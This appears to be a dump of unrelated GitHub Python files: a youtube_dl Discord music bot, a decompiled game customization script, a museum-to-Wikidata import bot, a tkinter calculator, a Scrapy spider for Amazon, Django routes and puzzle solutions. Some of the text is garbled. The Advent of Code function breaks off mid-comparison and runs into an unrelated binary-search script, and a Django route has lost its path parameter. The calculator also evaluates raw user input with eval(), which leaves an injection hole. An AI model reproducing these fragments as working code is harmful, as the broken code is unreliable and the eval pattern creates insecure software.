\"before_options\": \"-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5\",\n}\n\nytdl = youtube_dl.YoutubeDL(ytdl_format_options)\n\n\nclass YoutubeDLSource(discord.PCMVolumeTransformer):\n def __init__(self, source, *, data, volume=0.3):\n super().__init__(source, volume)\n\n self.data = data\n\n self.title = data.get(\"title\")\n self.url = data.get(\"url\")\n\n @classmethod\n async def from_music_data(\n cls,\n musicdata: IMusicData,\n *,\n loop: Optional[asyncio.AbstractEventLoop] = None,\n volume=0.3,\n ):\n _loop: asyncio.AbstractEventLoop = loop or asyncio.get_event_loop()\n data: Any | dict[str, Any] = await _loop.run_in_executor(\n None,\n lambda: ytdl.extract_info(musicdata.get_url(), download=False),\n )\n if data is None:\n raise BadLink(musicdata.get_url())\n if \"entries\" in data:\n data = data[\"entries\"][0]\n filename = (\n data[\"url\"] if \"url\" in data else ytdl.prepare_filename(data)\n )\n return cls(\n discord.FFmpegPCMAudio(filename, **ffmpeg_options),\n data=data,\n volume=volume,\n )\n\n\ndef search(arg):\n with ytdl:\n try:\n get(arg)\n except Exception:\n video = ytdl.extract_info(f\"ytsearch:{arg}\", download=False)\n if video is None:\n raise Exception(\"Could not find any video.\")\n if \"entries\" in video:\n video = video[\"entries\"][0]\n else:\n video = ytdl.extract_info(arg, download=False)\n\n return video\n\n\nclass YTMusicData(IMusicData):\n def __init__(self, title: str, url: str):\n self._title: str = title\n self._url: str = url\n\n @classmethod\n def from_url(cls, url: str) -> list[\"YTMusicData\"]:\n print(url)\n result = search(url)\n if result is None:\n raise BadLink(url)\n if \"entries\" in result:\n return [\n cls(video[\"title\"], video[\"url\"])\n for video in result[\"entries\"]\n ]\n video = result\n if \"original_url\" in video.keys():\n return [cls(video[\"title\"], video[\"original_url\"])]\n else:\n return [cls(video[\"title\"], video[\"url\"])]\n\n def get_title(self) -> str:\n return self._title\n\n def get_url(self) -> str:\n return self._url\n\n def get_artist(self) -> str:\n return \"Unknown\"\n\n async def get_source(self) -> YoutubeDLSource:\n return await YoutubeDLSource.from_music_data(self) # type: ignore
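\n\n# Editorial usage sketch (assumed call pattern, not from the repo):\n# for md in YTMusicData.from_url(\"never gonna give you up\"):\n# source = await md.get_source() # inside an async def\n\n\nclass FFmpegPCMAudio(discord.AudioSource):\n def __init__(\n self,\n source,\n *,\n executable=\"ffmpeg\",\n pipe=False,\n stderr=None,\n before_options=None,\n options=None,\n ):\n stdin = None if not pipe 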
else source\n args = [executable]\n if isinstance(before_options, str):\n args.extend(shlex.split(before_options))\n args.append(\"-i\")\n args.append(\"-\" if pipe else source)\n args.extend(\n (\"-f\", \"s16le\", \"-ar\", \"48000\", \"-ac\", \"2\", \"-loglevel\", \"warning\")\n )\n if isinstance(options, str):\n args.extend(shlex.split(options))\n args.append(\"pipe:1\")\n self._process = None\n try:\n self._process = subprocess.Popen(\n args,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=stderr,\n )\n self._stdout = io.BytesIO(\n self._process.communicate(input=stdin)[0]\n )\n except FileNotFoundError:\n raise discord.ClientException(\n executable + \" was not found.\"\n ) from None\n except subprocess.SubprocessError as exc:\n raise discord.ClientException(\n \"Popen failed: {0.__class__.__name__}: {0}\".format(exc)\n ) from exc\n\n def read(self):\n ret = self._stdout.read(Encoder.FRAME_SIZE)\n if len(ret) != Encoder.FRAME_SIZE:\n return b\"\"\n return ret\n\n def cleanup(self):\n proc = self._process\n if proc is None:\n return\n proc.kill()\n if proc.poll() is None:\n proc.communicate()\n\n self._process = None\n","repo_name":"TheSmileyDroid/harpi","sub_path":"src/res/utils/ytmusicdata.py","file_name":"ytmusicdata.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1158250297","text":"# 2015.11.18 11:52:16 Central Europe (standard time)\n# Embedded file name: scripts/client/gui/customization_2_0/data_aggregator.py\nimport copy\nfrom Event import Event\nfrom gui import GUI_SETTINGS\nfrom gui.game_control import getIGRCtrl\nfrom helpers.i18n import makeString as _ms\nfrom gui.shared import g_itemsCache as _g_itemsCache\nfrom gui.shared.ItemsCache import CACHE_SYNC_REASON, g_itemsCache\nfrom items.vehicles import g_cache as _g_vehiclesCache\nfrom items.qualifiers import g_cache as _g_qualifiersCache\nfrom CurrentVehicle import g_currentVehicle as _g_currentVehicle, g_currentVehicle\nfrom elements import AvailableCamouflage, AvailableInscription, AvailableEmblem, InstalledCamouflage, InstalledInscription, InstalledEmblem, Qualifier, CamouflageQualifier\n\nclass CUSTOMIZATION_TYPE:\n CAMOUFLAGE = 0\n EMBLEM = 1\n INSCRIPTION = 2\n\n\nSLOT_TYPE = {CUSTOMIZATION_TYPE.EMBLEM: 'player',\n CUSTOMIZATION_TYPE.INSCRIPTION: 'inscription'}\n_TYPE_NAME = {'emblems': CUSTOMIZATION_TYPE.EMBLEM,\n 'inscriptions': CUSTOMIZATION_TYPE.INSCRIPTION,\n 'camouflages': CUSTOMIZATION_TYPE.CAMOUFLAGE}\n_ITEM_CLASS = {CUSTOMIZATION_TYPE.EMBLEM: AvailableEmblem,\n CUSTOMIZATION_TYPE.INSCRIPTION: AvailableInscription,\n CUSTOMIZATION_TYPE.CAMOUFLAGE: AvailableCamouflage}\n_MAX_HULL_SLOTS = 2\n_MAX_TURRET_SLOTS = 2\nVEHICLE_CHANGED_EVENT = 'VEHICLE_CHANGED_EVENT'\n\nclass DataAggregator(object):\n\n def __init__(self):\n self.updated = Event()\n self.viewModel = []\n self.__installed = ()\n self.__availableItems = None\n self.__displayedItems = None\n self.__igrReplacedItems = None\n self.__notMigratedItems = None\n self.__itemGroups = None\n self.__initialViewModel = ()\n self.__cNationID = None\n self.__rawItems = None\n self.__vehicleInventoryID = None\n self.__displayIgrItems = getIGRCtrl().getRoomType() == 2 and GUI_SETTINGS.igrEnabled\n self.__availableGroupNames = None\n self.__gatherDataForVehicle(CACHE_SYNC_REASON.DOSSIER_RESYNC, None)\n _g_currentVehicle.onChanged += self.__onCurrentVehicleChanged\n _g_itemsCache.onSyncCompleted += self.__gatherDataForVehicle\n return\n\n def fini(self):\n 
_g_currentVehicle.onChanged -= self.__gatherDataForVehicle\n _g_currentVehicle.onChanged -= self.__onCurrentVehicleChanged\n self.__rawItems = None\n self.__installed = None\n self.__availableItems = None\n self.__notMigratedItems = None\n self.__displayedItems = None\n self.__initialViewModel = None\n self.__availableGroupNames = None\n self.__igrReplacedItems = None\n self.__itemGroups = None\n self.viewModel = None\n return\n\n @property\n def installed(self):\n return self.__installed\n\n @property\n def available(self):\n return self.__availableItems\n\n @property\n def displayed(self):\n return self.__displayedItems\n\n @property\n def initialViewModel(self):\n return self.__initialViewModel\n\n @property\n def availableGroupNames(self):\n return self.__availableGroupNames\n\n def __onCurrentVehicleChanged(self):\n if self.__vehicleInventoryID != g_currentVehicle.item.invID:\n self.__gatherDataForVehicle(VEHICLE_CHANGED_EVENT, None)\n return\n\n def __gatherDataForVehicle(self, updateReason, invalidItems):\n if updateReason in (CACHE_SYNC_REASON.DOSSIER_RESYNC, CACHE_SYNC_REASON.SHOP_RESYNC, VEHICLE_CHANGED_EVENT):\n self.__vehicleInventoryID = g_currentVehicle.item.invID\n curVehItem = _g_currentVehicle.item\n curVehDescr = curVehItem.descriptor\n self.__cNationID = curVehDescr.type.customizationNationID\n inDossier = (_g_itemsCache.items.getVehicleDossier(curVehItem.intCD).getBlock('camouflages'), _g_itemsCache.items.getVehicleDossier(curVehItem.intCD).getBlock('emblems'), _g_itemsCache.items.getVehicleDossier(curVehItem.intCD).getBlock('inscriptions'))\n self.__rawItems = [_g_vehiclesCache.customization(self.__cNationID)['camouflages'], _g_vehiclesCache.playerEmblems()[1], _g_vehiclesCache.customization(self.__cNationID)['inscriptions']]\n self.__itemGroups = (_g_vehiclesCache.customization(self.__cNationID)['camouflageGroups'], _g_vehiclesCache.playerEmblems()[0], _g_vehiclesCache.customization(self.__cNationID)['inscriptionGroups'])\n self.__availableGroupNames = []\n self.__displayedItems = [{}, {}, {}]\n self.__availableItems = [{}, {}, {}]\n self.__igrReplacedItems = [{}, {}, {}]\n self.__notMigratedItems = [set([]), set([]), set([])]\n inventoryItems = self.__setInventoryItems()\n installedRawItems = self.__setInstalledRawItems(curVehDescr)\n self.__installed = self.__setInstalledCustomization(curVehDescr.hull['emblemSlots'], curVehDescr.turret['emblemSlots'], installedRawItems)\n for cType in [CUSTOMIZATION_TYPE.CAMOUFLAGE, CUSTOMIZATION_TYPE.EMBLEM, CUSTOMIZATION_TYPE.INSCRIPTION]:\n self.__fillAvailableItems(cType, inDossier)\n self.__fillDisplayedItems(cType, inventoryItems)\n self.__fillDisplayedGroups(cType, inDossier, inventoryItems)\n\n self.updated(updateReason == VEHICLE_CHANGED_EVENT)\n\n def __setInstalledCustomization(self, vehicleHullSlots, vehicleTurretSlots, installedRawItems):\n installedHullEmblems = []\n installedTurretEmblems = []\n installedHullInscriptions = []\n installedTurretInscriptions = []\n hullEmblemSlotIdx = 0\n hullInscriptionSlotIdx = 0\n turretEmblemSlotIdx = 0\n turretInscriptionSlotIdx = 0\n for slot in vehicleHullSlots:\n if slot.type == SLOT_TYPE[CUSTOMIZATION_TYPE.EMBLEM]:\n installedHullEmblems.append(installedRawItems['emblems'][hullEmblemSlotIdx])\n hullEmblemSlotIdx += 1\n if slot.type == SLOT_TYPE[CUSTOMIZATION_TYPE.INSCRIPTION]:\n installedHullInscriptions.append(installedRawItems['inscriptions'][hullInscriptionSlotIdx])\n hullInscriptionSlotIdx += 1\n\n for slot in vehicleTurretSlots:\n if slot.type == 
SLOT_TYPE[CUSTOMIZATION_TYPE.EMBLEM]:\n installedTurretEmblems.append(installedRawItems['emblems'][_MAX_HULL_SLOTS + turretEmblemSlotIdx])\n turretEmblemSlotIdx += 1\n if slot.type == SLOT_TYPE[CUSTOMIZATION_TYPE.INSCRIPTION]:\n installedTurretInscriptions.append(installedRawItems['inscriptions'][_MAX_HULL_SLOTS + turretInscriptionSlotIdx])\n turretInscriptionSlotIdx += 1\n\n return ([ InstalledCamouflage(ic, 0) for ic in installedRawItems['camouflages'] ], [ InstalledEmblem(ihe, 0) for ihe in installedHullEmblems ] + [ InstalledEmblem(ite, 2) for ite in installedTurretEmblems ], [ InstalledInscription(ihi, 0) for ihi in installedHullInscriptions ] + [ InstalledInscription(iti, 2) for iti in installedTurretInscriptions ])\n\n def __setInstalledRawItems(self, curVehDescr):\n installedRawItems = {'camouflages': list(curVehDescr.camouflages),\n 'emblems': list(curVehDescr.playerEmblems),\n 'inscriptions': list(curVehDescr.playerInscriptions)}\n for key in installedRawItems.keys():\n for installedRawItem in installedRawItems[key]:\n installedItemID = installedRawItem[0]\n if installedRawItem[2] == 0 and installedItemID is not None and (_TYPE_NAME[key] != CUSTOMIZATION_TYPE.EMBLEM or _TYPE_NAME[key] == CUSTOMIZATION_TYPE.EMBLEM) and installedItemID not in self.__itemGroups[CUSTOMIZATION_TYPE.EMBLEM]['auto'][0]:\n self.__notMigratedItems[_TYPE_NAME[key]].add(installedItemID)\n\n if self.__displayIgrItems:\n igrLayout = g_itemsCache.items.inventory.getIgrCustomizationsLayout()\n vehicleId = g_currentVehicle.item.invID\n igrRoomType = getIGRCtrl().getRoomType()\n igrVehDescr = []\n if vehicleId in igrLayout:\n if igrRoomType in igrLayout[vehicleId]:\n igrVehDescr = igrLayout[vehicleId][igrRoomType]\n for key in igrVehDescr:\n for index in igrVehDescr[key]:\n replacedItemID = installedRawItems[key][index][0]\n replacedItemDaysLeft = installedRawItems[key][index][2]\n if replacedItemID is not None:\n self.__igrReplacedItems[_TYPE_NAME[key]][replacedItemID] = replacedItemDaysLeft\n installedRawItems[key][index] = igrVehDescr[key][index]\n\n self.__initialViewModel = (installedRawItems['emblems'], installedRawItems['inscriptions'])\n self.viewModel = [copy.deepcopy(installedRawItems['camouflages']), copy.deepcopy(installedRawItems['emblems']), copy.deepcopy(installedRawItems['inscriptions'])]\n return installedRawItems\n\n def __setInventoryItems(self):\n inventoryItems = [{}, {}, {}]\n inventoryCustomization = g_itemsCache.items.inventory.getItemsData('customizations')\n for isGold, itemsData in inventoryCustomization.iteritems():\n if itemsData:\n for key in (None, g_currentVehicle.item.intCD):\n if key not in itemsData:\n continue\n typedItemsData = itemsData[key]\n for cTypeName, items in typedItemsData.iteritems():\n cType = _TYPE_NAME[cTypeName]\n for item, itemNum in items.iteritems():\n if cType != CUSTOMIZATION_TYPE.EMBLEM:\n nationID, itemID = item\n else:\n nationID, itemID = None, item\n allowedVehicles = []\n if key is not None:\n allowedVehicles.append(key)\n if self.__cNationID == nationID or cType == CUSTOMIZATION_TYPE.EMBLEM:\n inventoryItems[cType][itemID] = [itemID,\n self.__rawItems[cType][itemID],\n None,\n isGold,\n allowedVehicles,\n [],\n (isGold, itemNum)]\n\n return inventoryItems\n\n def __fillAvailableItems(self, cType, inDossier):\n containerToFill = self.__availableItems[cType]\n groups = self.__itemGroups[cType]\n class_ = _ITEM_CLASS[cType]\n availableRawItems = self.__rawItems[cType]\n for itemID, availableRawItem in availableRawItems.iteritems():\n if cType != 
CUSTOMIZATION_TYPE.CAMOUFLAGE:\n if availableRawItem[7] in _g_qualifiersCache.qualifiers:\n qualifier = Qualifier(_g_qualifiersCache.qualifiers[availableRawItem[7]])\n else:\n qualifier = CamouflageQualifier('winter')\n group = groups[availableRawItem[0]]\n if len(group) == 5:\n allowedNations = None\n allowedVehicles = group[3]\n notAllowedVehicles = group[4]\n else:\n allowedNations = group[3]\n allowedVehicles = group[4]\n notAllowedVehicles = group[5]\n else:\n groupName = availableRawItem['groupName']\n qualifier = CamouflageQualifier(groupName[3:] if groupName.startswith('IGR') else groupName)\n allowedNations = None\n allowedVehicles = availableRawItem['allow']\n notAllowedVehicles = availableRawItem['deny']\n replacedByIGRItem = itemID in self.__igrReplacedItems[cType]\n isNotMigrated = itemID in self.__notMigratedItems[cType]\n containerToFill[itemID] = class_(itemID, availableRawItem, qualifier, itemID in inDossier[cType] or replacedByIGRItem or isNotMigrated, allowedVehicles, notAllowedVehicles, allowedNations, replacedByIGRItem)\n if itemID in self.__igrReplacedItems[cType]:\n containerToFill[itemID].numberOfDays = self.__igrReplacedItems[cType][itemID]\n\n return\n\n def __fillDisplayedItems(self, cType, inventoryItems):\n containerToFill = self.__displayedItems[cType]\n for itemID, availableItem in self.__availableItems[cType].iteritems():\n if availableItem.isInDossier:\n containerToFill[itemID] = availableItem\n if itemID in inventoryItems[cType]:\n availableItem.setAllowedVehicles(inventoryItems[cType][itemID][4])\n availableItem.markIsInDossier()\n if inventoryItems[cType][itemID][6][0]:\n availableItem.numberOfItems = inventoryItems[cType][itemID][6][1]\n else:\n availableItem.numberOfDays = inventoryItems[cType][itemID][6][1]\n if availableItem.isAllowedForCurrentVehicle:\n if cType == CUSTOMIZATION_TYPE.CAMOUFLAGE:\n groupName = itemID\n else:\n groupName = availableItem.getGroup()\n if itemID in inventoryItems[cType]:\n containerToFill[itemID] = availableItem\n elif self.__groupIsInShop(groupName, cType):\n containerToFill[itemID] = availableItem\n\n def __groupIsInShop(self, groupName, cType):\n return [lambda group: group not in g_itemsCache.items.shop.getCamouflagesHiddens(self.__cNationID), lambda group: group not in g_itemsCache.items.shop.getEmblemsGroupHiddens() and (group != 'group5' or self.__displayIgrItems), lambda group: group not in g_itemsCache.items.shop.getInscriptionsGroupHiddens(self.__cNationID) and (group != 'IGR' or self.__displayIgrItems)][cType](groupName)\n\n def __fillDisplayedGroups(self, cType, inDossier, inventoryItems):\n groups = []\n uniqueGroups = []\n for key, value in self.__itemGroups[cType].iteritems():\n if cType == CUSTOMIZATION_TYPE.CAMOUFLAGE:\n itemIDsInGroup = value['ids']\n groupUserName = value['userString']\n groupIsInShop = not key.startswith('IGR') or self.__displayIgrItems\n else:\n itemIDsInGroup = value[0]\n groupUserName = _ms(value[1])\n groupIsInShop = self.__groupIsInShop(key, cType)\n if groupIsInShop and key not in uniqueGroups and self.__groupIsDisplayed(key, cType):\n uniqueGroups.append(key)\n groups.append((key, groupUserName))\n for itemID in list(inDossier[cType]) + inventoryItems[cType].keys():\n if itemID in itemIDsInGroup and key not in uniqueGroups:\n uniqueGroups.append(key)\n groups.append((key, groupUserName))\n\n self.__availableGroupNames.append(groups)\n\n def __groupIsDisplayed(self, groupName, cType):\n for key, value in self.__displayedItems[cType].iteritems():\n if value.getGroup() == 
groupName:\n                return True\n\n        return False\n# okay decompyling c:\\Users\\PC\\wotsources\\files\\originals\\res\\scripts\\client\\gui\\customization_2_0\\data_aggregator.pyc \n# decompiled 1 files: 1 okay, 0 failed, 0 verify failed\n# 2015.11.18 11:52:16 Střední Evropa (běžný čas)\n","repo_name":"webiumsk/WOT-0.9.12","sub_path":"res/scripts/client/gui/customization_2_0/data_aggregator.py","file_name":"data_aggregator.py","file_ext":"py","file_size_in_byte":15525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33878530733","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nBot to import paintings from the Kroller-Muller Museum (KM)\n\nAPI is provided that can give everything in JSON format!\n\n* http://www.dimcon.nl/api/search?query=Kroller-Muller%20Museum&searchIn=all&qf=delving_hasDigitalObject_facet:true&facetBoolType=OR&format=json&start=51&rows=50\n\nUse artdatabot to upload it to Wikidata\n\n\"\"\"\nimport artdatabot\nimport pywikibot\nimport requests\n#import urllib2\nimport re\n#import HTMLParser\n#import xml.etree.ElementTree as ET\n\n\ndef getKMGenerator():\n    \"\"\"\n    Generator to return Kroller-Muller Museum. Keep grabbing the api until we have no more page left\n    \n    \"\"\"\n    searchBase=u'http://www.dimcon.nl/api/search?query=Kroller-Muller%%20Museum&searchIn=all&qf=delving_hasDigitalObject_facet:true&facetBoolType=OR&format=json&start=%s&rows=%s'\n    \n    start = 1\n    rows = 50\n    hasNext = True\n\n    #htmlparser = HTMLParser.HTMLParser()\n\n    while hasNext:\n        searchUrl = searchBase % (start, rows)\n        searchPage = requests.get(searchUrl)\n        searchJson = searchPage.json()\n\n        start = searchJson.get(u'result').get(u'pagination').get(u'nextPage')\n        hasNext = searchJson.get(u'result').get(u'pagination').get(u'hasNext')\n\n        for item in searchJson.get(u'result').get(u'items'):\n            itemfields = item.get('item').get(u'fields')\n            metadata = {}\n            #print itemfields\n\n            if itemfields.get('delving_collection')[0]==u'Kroller-Muller Museum':\n                metadata['collectionqid'] = u'Q1051928'\n                metadata['collectionshort'] = u'KM'\n                metadata['locationqid'] = u'Q1051928'\n            else:\n                #Another collection, skip\n                continue\n\n            if itemfields.get('dc_subject')[0].startswith(u'schilderkunst'):\n                metadata['instanceofqid'] = u'Q3305213' #This is painting, let's do sculptures too?\n                # Mind the description if we add sculptures!!!!!\n            else:\n                #Not a painting, skip\n                continue\n\n            if itemfields.get('europeana_uri')[0].startswith(u'kroller-muller/'):\n                metadata['url'] = u'http://dimcon.nl/dimcon/%s' % (itemfields.get('europeana_uri')[0],)\n            else:\n                #No url, skip\n                continue\n\n            if itemfields.get('dc_identifier')[0].startswith(u'KM '):\n                metadata['id'] = itemfields.get('dc_identifier')[0]\n                metadata['idpid'] = u'P217'\n            else:\n                #Something wrong with this id, skip\n                continue \n            \n            metadata['title'] = { u'nl' : itemfields.get('dc_title')[0],\n                                  }\n            metadata['inception'] = itemfields.get('dc_date')[0]\n            metadata['describedbyurl'] = itemfields.get('delving_landingPage')[0] # .replace(u'%20', u' ')\n\n            name = itemfields.get('dc_creator')[0]\n            nameRegex = u'^([^\\(]+)\\s\\([^\\)]+\\)$'\n            nameMatch = re.match(nameRegex, name)\n            if nameMatch:\n                metadata['creatorname'] = nameMatch.group(1)\n            else:\n                metadata['creatorname'] = name\n            \n            metadata['description'] = { u'nl' : u'%s van %s' % (u'schilderij', metadata.get('creatorname'),),\n                                        u'en' : u'%s by %s' % (u'painting', metadata.get('creatorname'),),\n                                        }\n            #print metadata\n            yield metadata\n\ndef main():\n    dictGen = 
getKMGenerator()\n\n    #for painting in dictGen:\n    #    print painting\n\n    artDataBot = artdatabot.ArtDataBot(dictGen, create=True)\n    artDataBot.run()\n    \n    \n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"multichill/toollabs","sub_path":"bot/wikidata/km_import.py","file_name":"km_import.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"5583902859","text":"import tkinter\nfrom assets import styles\n\nclass CalculatorScreen(tkinter.Frame):\n    def __init__(self, parent, controller):\n        super().__init__(parent)\n        self.configure(background=styles.BACKGROUND)\n        self.controller = controller\n\n        self.content_buttons = [\n            '(',')','CE','AC',\n            '7','8','9','/',\n            '4','5','6','*',\n            '1','2','3','-',\n            '0','.','=','+',\n        ]\n\n        self.content_screen = tkinter.StringVar()\n        self.show_operation = ''\n\n        self.create_widgets()\n    \n    def solve_operation(self):\n        try:\n            res = eval(self.show_operation)\n            res = str(res)\n        except SyntaxError:\n            res = 'Syntax error'\n        self.show_operation = res\n\n    def clic_button(self, content: str):\n        if content == self.content_buttons[3]: self.show_operation = ''\n        elif content == self.content_buttons[2]: self.show_operation = self.show_operation[:-1]\n        elif content == self.content_buttons[18]: self.solve_operation()\n        else: self.show_operation += content \n        self.content_screen.set(self.show_operation)\n\n    def back_menu(self):\n        self.content_screen.set('')\n        self.show_operation = ''\n        self.controller.show_frame('MenuGames')\n\n    def create_widgets(self):\n        tkinter.Label(self, text='Calculadora', **styles.TITLES).grid(column=0, row=0)\n        tkinter.Entry(self,textvariable=self.content_screen, font=('sans serif', 16)).grid(column=0, row=1, sticky=tkinter.NSEW)\n\n        buttons = tkinter.Frame(self)\n        buttons.grid(column=0, row=2, sticky=tkinter.NSEW)\n        c = 0\n        r = 0\n        for button in range(len(self.content_buttons)):\n            tkinter.Button(buttons, \n                text=self.content_buttons[button], \n                width=5,\n                height=3,\n                command=lambda con=self.content_buttons[button]: self.clic_button(con)).grid(\n                    column=c,\n                    row=r,\n                    sticky=tkinter.NSEW)\n            c += 1\n            if c == 4:\n                r += 1\n                c = 0\n        \n        tkinter.Button(self, text='⏮', command=self.back_menu).grid(column=0, row=3, sticky=tkinter.NSEW)\n        \n        self.grid_columnconfigure(0, weight=1)\n        for c in range(0, 4):\n            buttons.grid_columnconfigure(c, weight=1)\n","repo_name":"Juanchoner/Mini-Games","sub_path":"Calculator/Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32631288026","text":"\"\"\"AoC 13, 2022.\"\"\"\n\n# Standard library imports\nimport pathlib\nimport sys\nimport ast\nimport numpy as np\n\ndef parse_data(puzzle_input):\n    \"\"\"Parse input.\"\"\"\n    return([[ast.literal_eval(l) for l in line.split(\"\\n\")] for line in puzzle_input.split(\"\\n\\n\")])\n    \ndef compare(data_pair):\n    element_0, element_1 = data_pair\n    order = None\n    \n    for i in range(len(element_0)):\n        order = None\n        \n        try:\n            a = element_0[i]\n            b = element_1[i]\n            if type(a)==int and type(b)==int:\n                if a<b:\n                    order=True\n                elif a>b:\n                    order=False\n            else:\n                if type(a)==int:\n                    # convert to list\n                    a = [a]\n                if type(b)==int:\n                    # convert to list\n                    b = [b]\n                order = compare([a,b])\n        except IndexError:\n            order=False\n        if order is not None:\n            break\n    \n    if order is None:\n        if len(element_0) 10**(-12):\n        mid = (ok+ng)/2\n        v = a*mid + b*math.sin(c*mid*math.pi)\n        if v < 100.0:\n            ok = 
mid\n        else:\n            ng = mid\nprint(ok)","repo_name":"nami4mo/competitive-programming-problems","sub_path":"practice/abc001-041/abc026_d.py","file_name":"abc026_d.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42129091602","text":"import logging\n\nimport structlog\n\n\ndef configure_logging():\n    logging.basicConfig()\n    structlog.configure(\n        processors=[\n            structlog.stdlib.filter_by_level,\n            structlog.stdlib.add_logger_name,\n            structlog.stdlib.add_log_level,\n            structlog.processors.TimeStamper(fmt=\"%Y-%m-%d %H:%M:%S.%f\"),\n            structlog.processors.JSONRenderer(sort_keys=True),\n        ],\n        logger_factory=structlog.stdlib.LoggerFactory(),\n        wrapper_class=structlog.stdlib.BoundLogger,\n        cache_logger_on_first_use=True,\n    )\n\n    logger = structlog.wrap_logger(logging.getLogger(\"\"))\n    logger.setLevel(logging.DEBUG)\n","repo_name":"caulagi/serverless-python-rds-cron","sub_path":"src/logconfig.py","file_name":"logconfig.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"17777449736","text":"import cadquery as cq\nfrom cadquery import Workplane as WP\n\ndef scale(workplane: WP, x: float, y: float = None, z: float = None) -> WP:\n    if y is None: y = x\n    if z is None: z = x\n    t = cq.Matrix([\n        [x, 0, 0, 0],\n        [0, y, 0, 0],\n        [0, 0, z, 0],\n        [0, 0, 0, 1]\n    ])\n    return workplane.newObject([\n        o.transformGeometry(t) if isinstance(o, cq.Shape) else o\n        for o in workplane.objects\n    ])\n\na = WP().box(1,1,1)\nb = scale(a,1,2,3)\nc = scale(a,3)","repo_name":"sprightlyManifesto/cadQuery2","sub_path":"scaling.py","file_name":"scaling.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"24089954288","text":"import scrapy\nimport requests\nfrom copy import deepcopy\n\nclass AmazonSpider(scrapy.Spider):\n    name = 'amazon'\n    # allowed_domains = ['www.amazon.com']\n    start_urls = ['https://www.amazon.cn/b?ie=UTF8&node=42689071&ref_=sa_menu_top_pc_l1']\n\n    def parse(self, response, *args, **kwargs):\n        li_list = response.xpath('//div[@class=\"left_nav browseBox\"]/ul/li')\n        for li in li_list:\n            item = {}\n            item['cate'] = li.xpath('./a/text()').extract_first()\n            item['cate_url'] = response.urljoin(li.xpath('./a/@href').extract_first())\n            yield scrapy.Request(\n                url=item['cate_url'],\n                callback=self.parse_detail_cate,\n                meta={'item':deepcopy(item)}\n            )\n\n    def parse_detail_cate(self, response):\n        item = deepcopy(response.meta['item'])\n        li_list = response.xpath('//div[@id=\"mainResults\"]/ul/li')\n        data = response.xpath('//div[@data-index > -1]')[:-2]\n\n        # print(item['cate'],len(li_list))\n        if li_list:\n            # 第一页\n            for li in li_list:\n                item['product_name'] = li.xpath('./div/div[3]//h2/text() | ./div/div/div/div[2]/div[1]/div[1]/a/h2/text()').extract_first()\n                item['product_price'] = li.xpath('./div/div[5]//a/span[2]/text() | ./div/div/div/div[2]/div[2]/div[1]/div/a/span[2]/text()').extract_first()\n                item['product_url'] = li.xpath('./div/div[3]/div[1]/a/@href | ./div/div/div/div[2]/div[1]/div[1]/a/@href').extract_first()\n                yield item\n            # 翻页 div[contains(@class,\"a\")\n            next_url = response.urljoin(response.xpath('//a[contains(@title,\"下一页\")]/@href').extract_first())\n            if next_url:\n                yield scrapy.Request(\n                    url=next_url,\n                    callback=self.parse_detail_cate,\n                    meta={'item':{'cate':item['cate'],'cate_url':item['cate_url']}}\n                )\n        elif 
data:\n\n div_list = response.xpath('//div[@data-index > -1]')[:-2]\n for div in div_list: # a-size-medium s-inline s-access-title a-text-normal\n item['product_name'] = div.xpath('.//span[@class=\"a-size-base-plus a-color-base a-text-normal\"]/text() | .//span[@class=\"a-size-medium a-color-base a-text-normal\"]/text() | .//h2[@class=\"a-size-medium s-inline s-access-title a-text-normal\"]/text()').extract_first()\n item['product_price'] = div.xpath('.//span[@class=\"a-price-whole\"]/text()').extract_first()\n item['product_url'] = response.urljoin(div.xpath('.//h2[@class=\"a-size-mini a-spacing-none a-color-base s-line-clamp-4\"]/a/@href | .//a[@class=\"a-link-normal a-text-normal\"]/@href').extract_first())\n yield item\n\n # 翻页\n next_url = response.urljoin(response.xpath('//a[contains(text(),\"下一页\")]/@href').extract_first())\n yield scrapy.Request(\n url=next_url,\n callback=self.parse_detail_cate,\n meta={'item':{'cate':item['cate'],'cate_url':item['cate_url']}}\n )","repo_name":"Tao00612/amazonpro","sub_path":"amazonpro/spiders/amazon.py","file_name":"amazon.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22391913315","text":"from django.urls import path \nfrom . import views\nfrom django.conf.urls.static import static\n# from django.conf import settings\n\nurlpatterns = [\n path('', views.main_page, name='home'),\n path('add_note/', views.add_note, name='add_note'),\n path('submit/', views.submit_words_handler, name='submit_words_handler'),\n path('edit//', views.edit_page, name='change_page'),\n path('registration/', views.registration_user, name='registration'), # регистрация\n path('login/', views.login_user, name='login'), # для зареганного\n path('logout/', views.logout_user, name='logout'), # для выхода\n path('delete/', views.delete_page, name='delete'), # для выхода\n]","repo_name":"EnglishWordRepeater/Django_files","sub_path":"word_rep__app/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71730863161","text":"from collections import deque\nn,m,k,x=4,4,1,1\ngraph=[\n [],\n [2,3],\n [3,4],\n [],\n []\n]\nvisited=[-1]*(n+1)\nq=deque()\ndef bfs(v):\n q.append(v)\n visited[v]=0\n while q:\n now=q.popleft()\n for i in graph[now]:\n if visited[i]==-1:\n q.append(i)\n visited[i]=visited[now]+1\nbfs(x)\nflag=False\nfor i in range(n+1):\n if 